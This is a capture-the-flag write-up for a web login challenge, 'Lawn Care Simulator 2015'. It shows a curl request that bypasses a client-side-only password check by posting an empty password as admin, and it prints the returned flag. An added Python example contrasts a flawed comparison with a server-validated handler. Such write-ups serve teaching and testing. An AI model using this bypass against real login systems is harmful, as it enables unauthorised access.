The challenge description was: http://54.165.252.74:8089/

This web challenge was really easy. Actually, it was so easy that I think it wasn't meant to be that way. When you visit the link, you are greeted with the following screen:

Checking for SQL injection didn't return anything indicating that it was what we had to do, so I checked the network traffic while trying to log in and got the following POST data:

username:test
password:098f6bcd4621d373cade4e832627b4f6

Trying to log in without any password wasn't possible, but that was checked on the client side, so I tried it with curl in a terminal:

mrt$ curl 'http://54.165.252.74:8089/premium.php' --data 'username=admin&password='
<html>
<head>
    <title>Lawn Care Simulator 2015</title>
    <script src="//code.jquery.com/jquery-1.11.3.min.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">
</head>
<body>
<h1>flag{gr0wth__h4ck!nG!1!1!</h1></body>
</html>

We got our flag: flag{gr0wth__h4ck!nG!1!1!}
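The write-up does not show the source of premium.php, so the following is an added example, not the challenge's code: a hypothetical model of how a server can end up accepting an empty password when the "password required" rule exists only in the browser, next to a handler that validates the input itself. The account store, function names and the prefix-style comparison are all assumptions made for illustration.

```python
import hashlib
import hmac

# Constructed account store: username -> MD5 hex digest of the password,
# matching the hashed form the page's POST data shows the browser sending.
USERS = {"admin": hashlib.md5(b"constructed-admin-password").hexdigest()}


def login_trusting_client(username: str, password_hash: str) -> bool:
    """Hypothetical flawed check: assumes the browser never sends an empty value."""
    stored = USERS.get(username)
    if stored is None:
        return False
    # Compares only as many characters as the client supplied, so an empty
    # submission performs zero comparisons and falls through to success.
    for i, ch in enumerate(password_hash):
        if i >= len(stored) or stored[i] != ch:
            return False
    return True


def login_server_validated(username: str, password_hash: str) -> bool:
    """Same interface, with the input validated on the server."""
    stored = USERS.get(username)
    if stored is None:
        return False
    # Reject anything that is not a full 32-character lowercase hex digest.
    if len(password_hash) != 32 or any(c not in "0123456789abcdef" for c in password_hash):
        return False
    # Constant-time comparison of the complete value.
    return hmac.compare_digest(stored, password_hash)


def audit(handler) -> dict:
    """Run the same three constructed requests through a handler."""
    good = hashlib.md5(b"constructed-admin-password").hexdigest()
    return {
        "empty": handler("admin", ""),
        # md5("test"), the value seen in the page's POST data
        "wrong": handler("admin", hashlib.md5(b"test").hexdigest()),
        "correct": handler("admin", good),
    }


if __name__ == "__main__":
    print("trusting client :", audit(login_trusting_client))
    print("server validated:", audit(login_server_validated))
```

Running `audit` against both handlers as a regression test catches the case where a rule enforced by page JavaScript has no server-side counterpart.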